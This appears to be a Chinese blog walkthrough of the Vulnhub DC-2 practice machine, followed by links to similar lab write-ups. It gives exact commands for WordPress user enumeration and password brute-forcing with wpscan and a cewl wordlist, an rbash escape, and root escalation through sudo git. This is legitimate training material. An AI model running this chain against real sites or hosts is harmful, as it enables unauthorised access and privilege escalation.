Vulnhub靶场-DC-2靶机练习

最新推荐文章于 2024-05-18 19:56:12 发布
最新推荐文章于 2024-05-18 19:56:12 发布
阅读量390 收藏 1
点赞数 2
分类专栏: DC靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44877412/article/details/112911188
版权

Vulnhub-DC-2

daoyuan

零、环境配置

1、虚拟机:vmware 15.5.6

2、攻击环境:kali linux 2020.3 192.168.143.128

3、靶机:DC-2

靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。

一、信息收集

1、主机存活扫描

arp-scan -l

在这里插入图片描述

2、端口扫描

nmap -A -p- 192.168.143.135
发现开放的端口以及服务
80 wordpress
7744 ssh

在这里插入图片描述

3、脚本扫描

nmap --script=vuln 192.168.143.135

探测到网站CMS为wordpress,且有三个账号
admin
tom
jerry

在这里插入图片描述

二、漏洞探测

访问网站ip,无法显示,但网址栏解析域名为dc-2,
猜想是域名定向问题,直接在本地将ip与域名绑定。
sudo vim /etc/hosts

在这里插入图片描述
在这里插入图片描述

重新登入,可以访问,提示flag
flag1提示
提示一、需要cewl,百度cewl是啥~
提示二、一个账号不能找到就换一个

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

用cewl生成密码字典
cewl dc-2 > dc2.txt

在这里插入图片描述

用针对wordpress的扫描工具wordscan探测该域名
wpscan –-url http://dc-2 -e u //爆破用户名

扫描到网站有三个账号
admin
tom
jerry
在root目录下创建文档dc2.txt写入用户名字典

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

三、漏洞利用

wpscan --url http://dc-2 -U dc2u.txt -P dc2.txt  //利用wpscan爆破密码
 爆破出密码
 Username: jerry, Password: adipiscing
 Username: tom, Password: parturient

在这里插入图片描述

在这里插入图片描述

nikto -h http://dc-2  //网站敏感页面扫描
找到账号登入界面/wp-login.php

在这里插入图片描述在这里插入图片描述

登入账号得到 flag2,提示。。。。。。不知道它说什么

在这里插入图片描述

ssh账号密码远程登入
ssh jerry@192.168.143.135 -p 7744
echo $0 //查看权限 rbash
ls 
发现flag3 cat不可查看

在这里插入图片描述

rbash是受限制的shell,这里设法绕过rbash 
BASH_CMDS[a]=/bin/sh;a
/bin/bash

export PATH=$PATH:/bin/  #添加环境变量
export PATH=$PATH:/usr/bin  #使用cat命令

cat flag3.txt
绕过了rbash限制,查看flag3,得到提示su

在这里插入图片描述

su jerry //切换用户

发现flag4

cat flag4.txt

提示 git提权

在这里插入图片描述

sudo -l
查看可执行命令
得到git有root权限免密

sudo git -p help config
!/bin/sh

得到root,查看最终的flag
cat flag5.txt

在这里插入图片描述
在这里插入图片描述
如有错误,烦请不吝赐教。
转载请注明出处!
https://blog.csdn.net/qq_44877412
QQ:508173407

.风溪.
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 498
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
Vulhub-DC-2靶场通关攻略
weixin_51339377的博客
03-16 730
arp-scan -l nmap -sV -p- 192.168.109.140 也可以执行如下命令 可以探测目标主机是否存活 nmap -T4 -sP 192.168.109.140 也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下 nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt 想要访问可以进入如下...
vulnhub靶场实战系列-DC-2实战
最新发布
weixin_45221204的博客
05-18 1254
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行,本文使用VMware测试,每个镜像会有破解的目标,挑战的目标是获取操作系统的root权限和获得flag。WordPress CMS的信息搜集与利用,获得flag,根据提示进一步操作使用cewl获得目标上存在的用户信息,获得密码字典使用wpscan进行WordPress网站用户名爆破,生成用户字典使用wpscan进一步爆破获得可用的密码和用户。
VulnHubDC-2
qq_45434762的博客
03-22 362
一个粗糙的端口扫描通过对目标主机进行端口探测,发现只开放了80端口,那就先访问一下看当我们通过IP访问的时候,会自动跳转成 http://dc-2我们需要在/etc/hosts 文件中...
DC-2靶场
m0_74413354的博客
03-14 588
VulhubDC系列靶场DC2靶场通关
vulnhub-dc2靶场
longwanlian的博客
01-19 1977
1、hosts文件指定ip对应域名2、工具使用:cewl(收集网站字典)、dirb(目录探测)、wpscan(针对wordpress制作的扫描工具)3、linux命令compgen -c #查看当前可用命令find / -perm -u=s -type f 2>/dev/null #查找存在sudo权限的命令sudo -l #查看当前用户可使用的sudo权限6)][外链图片转存中…(img-UnDKf5oc-1705657141846)]至此结束1、hosts文件指定ip对应域名。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
DC2靶场 wordpress
m0_62438849的博客
03-03 1026
试着登录网站,但是没有看到登录框,所以要扫描一下整个网站目录,可以用dirb http://dc-2或者dirsearch -u(指定url)http://dc-2。然后就能访问网站了,看到flag1,常用的字典攻击可能会不奏效,需要用 字典生成工具cewl,密码总是越多越好,但无法获得所有密码,登录后可以看到下一个flag。可以知道登录入口是,http://dc-2/wp-admin/(wordpress的登录入口就是/wp-admin/)Cewl是一个 ruby 应用,爬行指定url的指定深度。
docker—vulhub—struts2漏洞复现详细过程(s2-001/007/008)
AmyBaby00的博客
11-14 2946
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 简介&准备: 1、centos7 已开启docker :systemctl restart docker.service 2、进入vulhub —struts2 : cd vulhub/struts2 3、启用测试环境:docker-compose up -d 4、PC...
DC2靶场渗透流程(超详细)
m0_64583632的博客
04-02 555
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 DC-2 和DC-1 差不多 还是需要找到5个flag
vulhub靶场 DC-2 解析及完整复现
黑战士的博客
02-21 895
*4.rbash提权**
vulnhubDC-1
BurYiA的博客
05-02 564
文章目录vulnhubDC-1准备工作1.主机查找2.信息搜集3.正文方法一方法二 vulnhubDC-1 大神们可以退场了,小白的第一篇文章,可能会有很多错误,很多地方可能也会说不清楚。望见谅。 前段时间了解到这个平台,然后就开始难受了,真心不会做(就是太菜了)。闲话就不多说了,开始吧 准备工作 1.DC-1虚拟机(可能得搭梯子,自行尝试) 2.kali虚拟机 1.主机查找 这个就是基本操作...
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 1364
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC靶场系列--DC2
BGiscool的博客
08-09 1466
DC2靶场
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2702
DC-2靶机渗透测试思路及流程
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值